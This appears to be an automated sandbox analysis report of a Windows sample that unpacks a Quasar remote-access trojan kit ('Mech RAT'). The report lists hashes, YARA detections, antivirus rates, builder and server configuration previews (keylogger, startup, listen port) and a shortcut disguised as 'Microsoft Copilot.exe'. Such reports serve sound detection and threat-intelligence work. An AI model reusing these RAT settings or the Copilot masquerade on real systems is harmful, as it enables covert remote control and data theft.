                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):74128
                                                                                    Entropy (8bit):6.070390732993235
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CHXw2c75z0KqmKkONYfVmiCpmivfD7XXyAHHof0qokuUz2:u+75zamKXqfVmjnD7XXyAozo4i
                                                                                    MD5:81930CFE170ACD3A8E7498FD706A93C9
                                                                                    SHA1:E1868F03638B3B94027AFE2C4F1CDA84D39C1054
                                                                                    SHA-256:9DDDB3C2958A276F6B6AFD9FADE11CCA191E2F0635F29A39718C60F8F278A4C3
                                                                                    SHA-512:1120633361C962A6828799898B2C43EF72402F6EEC3D40761E875BF5FE08CEA77CDEF762F6B8840B6A747A534427AF2F0B54AE906C39753A7FACB17FF52949AA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):43008
                                                                                    Entropy (8bit):5.685334400720219
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Ar5EYZep98C87KHeBUZwrEzsEAnbF+em50KktmM4CRIcZwMRTIzMAtpw:Ar59g98C87KHeBUb5AnZG+zdwMRTzAtS
                                                                                    MD5:1C6ACA0F1B1FA1661FC1E43C79334F7C
                                                                                    SHA1:EC0F591A6D12E1EA7DC8714EC7E5AD7A04EF455D
                                                                                    SHA-256:411F8ED8C49738FA38A56ED8F991D556227D13602E83186E66AE1C4F821C940B
                                                                                    SHA-512:1C59E939D108F15881D29FE4CED4E5FA4A4476394B58B6EB464DA77192CB8FE9221B7CD780AF4596914D4CCE7C3FC53F1BB567F944C58829DE8EFBE1FD87BE76
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):89600
                                                                                    Entropy (8bit):6.1605081383984075
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:2OCAsdBo+am5OMwr5IlALYKXgAJGsZhTjrjvjCXeO:ZCjta0OMuIlArVJGqT/jveXeO
                                                                                    MD5:6D5EB860C2BE5DBEB470E7D3F3E7DDA4
                                                                                    SHA1:80C76660B87C52127B1A7DA48E27700F75362041
                                                                                    SHA-256:447EDE1984BB4ACD73BD97C0EC57A11C079CEE8301C91FB199CA98C1906D3CC4
                                                                                    SHA-512:64CF4FE7DE68A35720D2B9338BA9CF182E127D95D72D2CCF7FF5C73A368133663E70C988A460825FA87B2D03717A4447948D5262F56ACEB7C3BF1CB3AB5A41A5
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):27648
                                                                                    Entropy (8bit):5.66984672445043
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:70ve8JOuJ5iC7n2NwxEXCni+VXcMeDz8PmR1ugLoaeuLMBG9UphJAprjE3uFLHa9:7+m4iCyrXOhG8uRssveum1pMFLHFBvd
                                                                                    MD5:6E7F0F4FFF6C49E3F66127C23B7F1A53
                                                                                    SHA1:14A529F8C7EE9F002D1E93DCF8FF158AB74C7E1A
                                                                                    SHA-256:2E2623319BDC362974A78EA4A43F4893011EC257884D24267F4594142FCD436E
                                                                                    SHA-512:0C773DA6717DD6919CD6241D3CEE26AB00BB61EA2DBEFF24844A067AF4C87FF5CBDB2FE3ADA5DB4707CEE921B3FB353BD12EE22B8490597D4F67AD39BACE235E
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):358400
                                                                                    Entropy (8bit):6.1847100658767244
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:jIevdbLPNYe8bikm98KXPHhOWY/fFREomhUFD3z:se1PNL+QRfBg/f/EWFD
                                                                                    MD5:DE69BB29D6A9DFB615A90DF3580D63B1
                                                                                    SHA1:74446B4DCC146CE61E5216BF7EFAC186ADF7849B
                                                                                    SHA-256:F66F97866433E688ACC3E4CD1E6EF14505F81DF6B26DD6215E376767F6F954BC
                                                                                    SHA-512:6E96A510966A4ACBCA900773D4409720B0771FEDE37F24431BF0D8B9C611EAA152BA05EE588BB17F796D7B8CAACCC10534E7CC1C907C28DDFA54AC4CE3952015
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):70144
                                                                                    Entropy (8bit):5.78589762648947
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:sF6vHHLFkywkNh5qtHMjkCifoydVXw5FxusiolecziijiSvD+ZGFa4Pw6OdrGHUm:8GmyJNh0tbt3MLQ9W2rG0Ydd
                                                                                    MD5:CC6F6503D29A99F37B73BFD881DE8AE0
                                                                                    SHA1:92D3334898DBB718408F1F134FE2914EF666CE46
                                                                                    SHA-256:0B1E0D8F87F557B52315D98C1F4727E539F5120D20B4CA9EDBA548983213FBB5
                                                                                    SHA-512:7F4C0A35B612B864AD9BC6A46370801ED7433424791622BF77BF47D6A776CB6A49E4977B34725EAD5D0FEAA1C9516DB2CA75CB8872C77A8F2FAB6C37740B681F
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1013
                                                                                    Entropy (8bit):5.017779838990778
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:17K0ivy0XrKROKVE2rkrKYO62fkK4fbKsl1cKm8PJqKmCKusEYkKa+nXLUWhl:M0ivymRkC/17c4qI1sIUBhl
                                                                                    MD5:25581BF0865D64D7F8EA5A3ACC956592
                                                                                    SHA1:9190781F80A37B83F6E7FA0ABAFDE0C1EF5FB9D1
                                                                                    SHA-256:A73994F314E7E4930EF03BF8C91C47AAD8198EF40E3EAE50B8FFC1AA448E5A3B
                                                                                    SHA-512:BF2E284B0BEC9D496E3AC00406972DE86DA773F5ADF88A4DF12671FC92F78FDB552A942B3843EDAA51A3FADFE0639CFB73BFFAE1A66003FD65E1954E1AAD3957
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Profiles\Default.xml, Author: Joe Security
                                                                                    Preview:<settings>.. <Tag>Office04</Tag>.. <Hosts>.. </Hosts>.. <Delay>3000</Delay>.. <Mutex>a1c8abd1-1a5d-4c7c-bb2f-f980e67c7a2b</Mutex>.. <UnattendedMode>False</UnattendedMode>.. <InstallClient>False</InstallClient>.. <InstallName>Client</InstallName>.. <InstallPath>1</InstallPath>.. <InstallSub>SubDir</InstallSub>.. <HideFile>False</HideFile>.. <HideSubDirectory>False</HideSubDirectory>.. <AddStartup>False</AddStartup>.. <RegistryName>Quasar Client Startup</RegistryName>.. <ChangeIcon>False</ChangeIcon>.. <IconPath>.. </IconPath>.. <ChangeAsmInfo>False</ChangeAsmInfo>.. <Keylogger>False</Keylogger>.. <LogDirectoryName>Logs</LogDirectoryName>.. <HideLogDirectory>False</HideLogDirectory>.. <ProductName>.. </ProductName>.. <Description>.. </Description>.. <CompanyName>.. </CompanyName>.. <Copyright>.. </Copyright>.. <Trademarks>.. </Trademarks>.. <OriginalFilename>.. </OriginalFilename>.. <ProductVersion>.. </ProductVersion>.. <FileVersion>.. </FileVersion>
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):6144
                                                                                    Entropy (8bit):4.400390736215939
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:PW2zmDjGTY4XpEGD/pzLrSS/B4uhCd0oivAJvt:eyTYiEMFSS/B7hCd0Rg
                                                                                    MD5:80F6AD73B7E99271DE1EB4EC8432FFF0
                                                                                    SHA1:3C812B1CB349612C8B7551CB4881569F58348A3C
                                                                                    SHA-256:713CC97507E5B745227A6F1D194C7AE32855FB378B9573ED4819F8B73AEB3EBF
                                                                                    SHA-512:645DF198A6712B163DE602142EC59B342DDD73AF02F4631E74E9DB090DAE537E969B3EF722D1DE3F2344CE8893E5C1C438803E3D1BBEFB04FD107984588B5920
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ...@....... ....................................`.................................4...O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................h.......H........!..@............................................................0.."........d..r...p(....%(....o.......(....*n......%..M.%..Z.(....(....*n......%....%..].(....(....*..(....*...0..8........d(......2(....s....%.o......(......(...+.o.......(...+*.0..J........d(.....(.....o .....2(....s....%.o!.....(.....(".....(#....o$......(%...*..(....*...0...........d(......(&...%(.....(...+*..(....*..0..0.......!........s'... .... ....s(.....o)...%(....("...*..(....*BSJB............
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):64000
                                                                                    Entropy (8bit):5.929506337577614
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:liF6Vg9HIxFMu9brfp0kUEb9k/pUHRfp0YDpb4rILMgYY44YYXINk6I+QyIFLwSt:19UlJf2fhVYkEVIa8IKB
                                                                                    MD5:F6056C568CCF3A2917DDB28211DBD599
                                                                                    SHA1:C8A9EF83C205B55DD638D476245A1B4D66F2D321
                                                                                    SHA-256:BBEEB26BD5327DD4CCACB298D176BCE874BD1393FDF9558199F32568F3948346
                                                                                    SHA-512:BA6C0FC4B807F4A140070C0F3A72D4C3BD1343E8BEFEBF0A321273618B75A11B77E7CD5759534895066A58A3351616D20A4018E3D408F1CBAFE41A79711CB6E9
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dll, Author: Florian Roth
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....v..........." ..0.................. ... ....... .......................`............`.................................|...O.... .......................@......`................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........W...............................................................(!...*..{....*"..}....*..{....*"..}....*..-..*..3..*.(.....o....3..(.....o......*.*B.-.....*..o....*...(.......*6..u....(....*:.(.....(....a*.r...p.(.....S....(.....S...("...*..(!...*....0..W........(!...~#....s$......r...p(....}......s%...}.....{....o&.......{....o&....~'....js$....*:..o.....((...*^.,..{....,..{....o)...*...0..........s*.......{.....{....o+....o,.......,..o......*..........."......V..P
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):176
                                                                                    Entropy (8bit):5.010753391314124
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vFWWMNHU8LdgCQcIMOoIRuQVK/FNURAmIRMNHjFHr0lUfEyhTRtaKWREBAW4QIMO:TMVBd1IffVKNC7VJdfEyFRtUuAW4QIT
                                                                                    MD5:C8CD50E8472B71736E6543F5176A0C12
                                                                                    SHA1:0BD6549820DE5A07AC034777B3DE60021121405E
                                                                                    SHA-256:B44739EEFF82DB2B575A45B668893E2FE8FDD24A709CBF0554732FD3520B2190
                                                                                    SHA-512:6E8F77FCCA5968788CC9F73C9543CE9AB7B416372BC681093AA8A3AAD43AF1F06C56FCBC296C7897A3654B86A6F9D0E8B0FE036677CF290957924377BC177D9F
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" />.. </startup>..</configuration>
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):77824
                                                                                    Entropy (8bit):5.915078814901636
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:CSSYikTF0Z+sFGu11tIcyI1MtI9eDG3fL7:CJYD0Z9FGu11teI1r9ea3
                                                                                    MD5:944CE5123C94C66A50376E7B37E3A6A6
                                                                                    SHA1:A1936AC79C987A5BA47CA3D023F740401F73529B
                                                                                    SHA-256:7DA3F0E77C4DDDC82DF7C16C8C781FADE599B7C91E3D32EEFBCE215B8F06B12A
                                                                                    SHA-512:4C034FF51CC01567F3CB0796575528CA44623B864EB606266BCF955A9259ED26B20BEC0086D79038158D3A5AF2ADA0A90F59D7C6AAE9E545294FE77825DBE08B
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..&...........D... ...`....... ....................................`..................................D..O....`...............................C..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................D......H..........................................................................c...(....(.....c...}......(.....{.....c...(....jXs....*...|....{....o......|....{....o......|....{....o.....(....&*..0..>........e...(.....|....{.....1...(......(....-..*.|....{.......( ...*2.|....{....*6.|.....}....*.r...p.(.....(.....4....|....{....(...+r...pr#..po!...("...*..(#...*..{....*"..}....*..s$...}.....~%...~%.....s.....(.....(....*n.s$...}..............(....*....0..C........{Q....c...(....
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):177664
                                                                                    Entropy (8bit):7.499743289424205
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:xilDAVET7oenGBTdkl/xBSFq7mGpbcilDAVET7teNA:oSal7lOFqKGpbFSa
                                                                                    MD5:1C4E173F9D93CA70E8FA4E983AEC18D0
                                                                                    SHA1:C56B966ACF47447241342DE376D8639B3B142161
                                                                                    SHA-256:1BB7CA30AA772031E1071C384A267023FF783823F37467C0B13A8836858BE7D3
                                                                                    SHA-512:45B66311E8DB1E8899D70388394D08934AF049F59CE9E69849BDD7B01279F1631A3AB304A9C355B4486AAD73273C9158D65238DFE6E424722C61E437A6FE7CC8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g...........!................~.... ........... ....................... ............@.................................,...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H...........\...........P ..}...........................................y..............lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ahSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a.System.Windows.Forms.Image
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3290624
                                                                                    Entropy (8bit):5.997416065677387
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:snl7+y2FqZaVmN+PqlhU/mevlL1nY1sdeIfxUuxG2THHB72eh2NT:snp+y2FqZaVmN+PqlhU//vlL1Y1sQSx
                                                                                    MD5:1BF9DDE847E5C6953476C65B380FD510
                                                                                    SHA1:A7BE03A218DAE86518F0630133D518186E00FDAA
                                                                                    SHA-256:A19D139901151F58B3887A745A8268C21FD7EEFE5565630BCC7A8320319DAE6F
                                                                                    SHA-512:5CC2E08C22E972F8C0E603A32C5FB548B8C657B3EE2C8C6862CCF0C4A22FA531F9672BF5757C27723C69C44D1CCF84AA4D45B61DD3B440221760E7902CE79CB9
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Joe Security
                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Joe Security
                                                                                    • Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: Florian Roth
                                                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: ditekSHen
                                                                                    • Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.bin, Author: ditekshen
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.g.................&2..........D2.. ........@.. ........................2...........@..................................C2.W....`2.......................2...................................................... ............... ..H............text....$2.. ...&2................. ..`.rsrc........`2......(2.............@..@.reloc........2......42.............@..B.................C2.....H........a..................p............................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(....*....0..8.......(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........--..........00.......0..@........o....,7(....(0....s....%.o....%.o....%.o....(....&..&...(.....*........-5..........08......f~w...,.~....(....(....*.*..v.(.....s....}.....s....}....*..r..(......(.....(......(....*....0..L........{....r...po
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):289280
                                                                                    Entropy (8bit):6.509493607173111
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:yRAISQ1tRSVB3zpKTEPn6Rc0qus/6GMzzeSXLifsE2s58IB7aoqng5YnDBzs39AH:yRFD1niy6n6KwhO5mIYpnNzgGD0u
                                                                                    MD5:ABC82AE4F579A0BBFA2A93DB1486EB38
                                                                                    SHA1:FAA645B92E3DE7037C23E99DD2101EF3DA5756E5
                                                                                    SHA-256:CA6608346291EC82EE4ACF8017C90E72DB2EE7598015F695120C328D25319EC6
                                                                                    SHA-512:E06EE564FDD3FE2E26B0DEC744A969A94E4B63A2E37692A7DCC244CB7949B584D895E9D3766EA52C9FE72B7A31DACF4551F86EA0D7C987B80903FF43BE9FAED3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....B..........." ..0..`..........j~... ........... ..............................s.....`..................................~..O...................................x...p............................................ ............... ..H............text...p^... ...`.................. ..`.rsrc................b..............@..@.reloc...............h..............@..B................K~......H..........,.............................................................(<...*..(<...*V!..k.@....s=........*..(>...*&...(....*.0..W........-.r...ps?...z.o|......;......Y.B......(@.....~A...(B...,..j....8.....~C...(B...,..j....8.....!..i*....]-....!..i*....[.+d.!.h.a....]-....!.h.a....[.+G. .F.#j]-.... .F.#j[.+0. ....j]-.... ....j[.+.. .'..j]-.... .'..j[.+.....(......,....(}.....(.....,....(}.....(.....,....(}.....(......(....*..(@....(....*r...p.o|.........3...oD...(E...s..
                                                                                    Process:C:\Windows\SysWOW64\7za.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):373
                                                                                    Entropy (8bit):4.820847191105035
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:i+Ms7RbCGflVOkKsLVOC13/8Kk0odWKGJAZK2QjErKwgtyYKCR2AZK2TZw6r4JZI:i+hRxnOkKkO48Kwe2K2QjYKhyCbK2S+f
                                                                                    MD5:B6AF1DA05C1A00991F04F8B898CEA532
                                                                                    SHA1:24C48B062D8D864EEFD32F2D84A36E1A7282E911
                                                                                    SHA-256:F2EF0D8F29904A65CE6DBE29BAF9379FB4659AFB6930A5AF5D9FB88F73B73F41
                                                                                    SHA-512:2AB2DE469911C3FEE5B9BBFDBB373E5EB15023BF25B9E1835EBBF5890C66CFD7A06D7D5911E2FB630AFADF9B30489E589634CEFE52CA4C4156AE24B24C00C8AA
                                                                                    Malicious:false
                                                                                    Preview:<settings>.. <ListenPort>4782</ListenPort>.. <IPv6Support>False</IPv6Support>.. <AutoListen>False</AutoListen>.. <ShowPopup>False</ShowPopup>.. <UseUPnP>False</UseUPnP>.. <ShowToolTip>False</ShowToolTip>.. <EnableNoIPUpdater>False</EnableNoIPUpdater>.. <NoIPHost>.. </NoIPHost>.. <NoIPUsername>.. </NoIPUsername>.. <NoIPPassword>.. </NoIPPassword>..</settings>
                                                                                    Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):7334
                                                                                    Entropy (8bit):5.291629956664462
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:w3hYmtIReFG0m0r+0rn0rC0rP0r3q9KGqSfIJJ3p:w3w0P
                                                                                    MD5:B299AFFC161B46AF67CB2654206891D2
                                                                                    SHA1:10A1C74407496B0274FAB04B0C7372737F6CFBAA
                                                                                    SHA-256:1D1AE82F5EC1493F160E7338F697C543BC433C9B4B536EFCBED1046362A965EB
                                                                                    SHA-512:1B1368453F3FFF9DC76F12C1069F9B9ADB9EB31EA03CA0DCA25494E342537646E6AE1B0D34E6D39AA772806FF6AB9F209640C523A3E282CCD5A1454B96C11C8F
                                                                                    Malicious:false
                                                                                    Preview:10/06/2024 6:53 PM: Unpack: C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Tmp dir: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: Scanning the drive for archives:..10/06/2024 6:53 PM: Received from standard out: 1 file, 6550613 bytes (6398 KiB)..10/06/2024 6:53 PM: Received from standard out: ..10/06/2024 6:53 PM: Received from standard out: Extracting archive: C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Received from standard out: --..10/06/2024 6:53 PM: Received from standard out: Path = C:\Users\user~1\AppData\Local\Temp\Mech RAT.zip..10/06/2024 6:53 PM: Received from standard out: Type = zip..10/06/2024 6:53 PM: Received from standard out: Physical Size = 6550613
                                                                                    Process:C:\Users\user\AppData\Local\Temp\Copilot.exe
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 6 23:35:09 2024, mtime=Sun Oct 6 23:35:09 2024, atime=Sun Oct 6 23:35:09 2024, length=71680, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1108
                                                                                    Entropy (8bit):5.009701879687133
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8CpHNC2qDRQgKa8X+SYVHAWdZCb0Ve77G4EUwqygm:8CpHNC2qDRgLqgWdZCbWe3XEmyg
                                                                                    MD5:67355DEDCEBA4B0E295A8F36FA46EACA
                                                                                    SHA1:BDCB02A1873E842484D933282E281B20D58E854F
                                                                                    SHA-256:48EFF580E4A0BDC10ACB5AC62C596B65913DE23A3E3BB6123D6DA3150099A5B9
                                                                                    SHA-512:7B11493563D0C099E5860313C0F93BBAC67B2F5446281D4868CA032C49FD3E3BEF78491C7EFC784E94AC77DF074171B8D6169375A90B32512AE4F9455999EDC8
                                                                                    Malicious:false
                                                                                    Preview:L..................F.... .......P.......P.......P.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....[F}B......P.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=GYO...........................3*N.A.p.p.D.a.t.a...B.P.1.....FY....Local.<......EW.=GYO...............................L.o.c.a.l.....N.1.....GYX...Temp..:......EW.=GYX...........................2.o.T.e.m.p.....x.2.....GYe. .MICROS~1.EXE..\......GYe.GYe......N....................a}N.M.i.c.r.o.s.o.f.t. .C.o.p.i.l.o.t...e.x.e.......j...............-.......i.............4......C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exe..2.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.M.i.c.r.o.s.o.f.t. .C.o.p.i.l.o.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......301389...........hT..CrF.f4... ..{k.C....,......hT..CrF.f4... ..{k.C....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1
                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                    Entropy (8bit):7.999726717791036
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • VXD Driver (31/22) 0.00%
                                                                                    File name:PixpFUv4G7.exe
                                                                                    File size:6'669'824 bytes
                                                                                    MD5:75c7da1457f052ae8aa48571898d4094
                                                                                    SHA1:b851a0ba41ced091fd775b72c91b329d387cdeff
                                                                                    SHA256:066cffd2ba05642d4bcadf466fa00ba50210b6aed526c07382924c7aaece384e
                                                                                    SHA512:78279310fe36ba0f1d0b54ecc03f13b2094f207778bb07dfd56f88cba9a5e71cf589eb035e973fb533c161e70034fa4e0a6230e79a70bf18f30f79a327bfcdc8
                                                                                    SSDEEP:196608:ebykpmsXWNegK1D2+XUrsLrB9L8kIgCBtorLeeN5nMzl6:uyymcWZID2gNqkI/torLeeN5Mzl
                                                                                    TLSH:896633CA6363A994D7D9D4B8996120370CE8D28C10BFE422E77C3964D53C923E6ED8DD
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.............................e.....u........0e...@...........................e.......f....................................
                                                                                    Icon Hash:c18686cccc8ef0cc
                                                                                    Entrypoint:0x401475
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                    DLL Characteristics:
                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:a9c887a4f18a3fede2cc29ceea138ed3
                                                                                    Instruction
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    sub esp, 00000008h
                                                                                    nop
                                                                                    mov eax, 00000004h
                                                                                    push eax
                                                                                    mov eax, 00000000h
                                                                                    push eax
                                                                                    lea eax, dword ptr [ebp-04h]
                                                                                    push eax
                                                                                    call 00007F1940D138B1h
                                                                                    add esp, 0Ch
                                                                                    mov eax, 00401453h
                                                                                    push eax
                                                                                    call 00007F1940D138F3h
                                                                                    mov eax, 00000001h
                                                                                    push eax
                                                                                    call 00007F1940D138F0h
                                                                                    add esp, 04h
                                                                                    mov eax, 00030000h
                                                                                    push eax
                                                                                    mov eax, 00010000h
                                                                                    push eax
                                                                                    call 00007F1940D138E4h
